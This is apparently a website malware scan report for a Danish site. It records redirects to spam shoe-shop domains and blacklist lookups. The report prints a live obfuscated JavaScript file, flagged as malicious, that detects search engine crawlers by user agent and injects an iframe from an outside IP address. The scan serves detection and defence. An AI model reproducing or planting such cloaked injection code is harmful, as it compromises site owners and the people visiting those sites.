Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.bjarnehoyen.dk/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.bjarnehoyen.dk Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Object moved Cache-Control: private Date: Wed, 17 Sep 2014 07:28:24 GMT Location: http://nikefreedk.whichbegforthatsort.info/ Server: Microsoft-IIS/6.0 Content-Length: 164 Content-Type: text/html Set-Cookie: ASPSESSIONIDSAQDQTDD=BMLBDEIALHABLFAIHDNNOPNL; path=/ X-Powered-By: ASP.NET | malicious |
URL: http://nikefreedk.whichbegforthatsort.info/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: nikefreedk.whichbegforthatsort.info Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 17 Sep 2014 07:28:26 GMT Location: http://www.freerunningskodame.com/ Server: Apache/2 Content-Length: 329 Content-Type: text/html; charset=iso-8859-1 | suspicious |
Scanned pages/files
Request | Server response | Status |
http://www.bjarnehoyen.dk/ | 200 OK Content-Length: 26732 Content-Type: text/html | clean |
http://www.bjarnehoyen.dk/berlin-filer\image2931.js | 200 OK Content-Length: 987 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var HbgHGa1 = 0;var UFFC2 = navigator["\x75\x73\x65\x72\x41\x67\x65\x6e\x74"];UFFC2 = UFFC2["\x74\x6f\x4c\x6f\x77\x65\x72\x43\x61\x73\x65"]();var cZOEmDCvK3 = new window["\x41\x72\x72\x61\x79"]();cZOEmDCvK3[1] = '\x67\x6f\x6f\x67\x6c\x65\x62\x6f\x74';cZOEmDCvK3[2] = '\x61\x6f\x6c';cZOEmDCvK3[3] = '\x61\x73\x6b';cZOEmDCvK3[4] = '\x79\x61\x68\x6f\x6f';cZOEmDCvK3[5] = '\x62\x69\x6e\x67';for(k in cZOEmDCvK3){ if(UFFC2["\x69\x6e\x64\x65\x78\x4f\x66"](cZOEmDCvK3[k])>0) { HbgHGa1 = 1; break; }}if(HbgHGa1==1){ window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\x2f\x2f\x39\x38\x2e\x31\x35\x39\x2e\x31\x30\x35\x2e\x36\x30\x2f\x6c\x6b\x33\x2e\x68\x74\x6d\x6c\" \x73\x63\x72\x6f\x6c\x6c\x69\x6e\x67\x3d\"\x6e\x6f\" \x66\x72\x61\x6d\x65\x62\x6f\x72\x64\x65\x72\x3d\x30 \x77\x69\x64\x74\x68\x3d\"\x39\x30\x30\" \x68\x65\x69\x67\x68\x74\x3d\"\x34\x38\x30\"\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e");} Antivirus reports:
http://www.bjarnehoyen.dk/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bjarnehoyen.dk
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bjarnehoyen.dk/
Result: bjarnehoyen.dk is not infected or malware details are not published yet.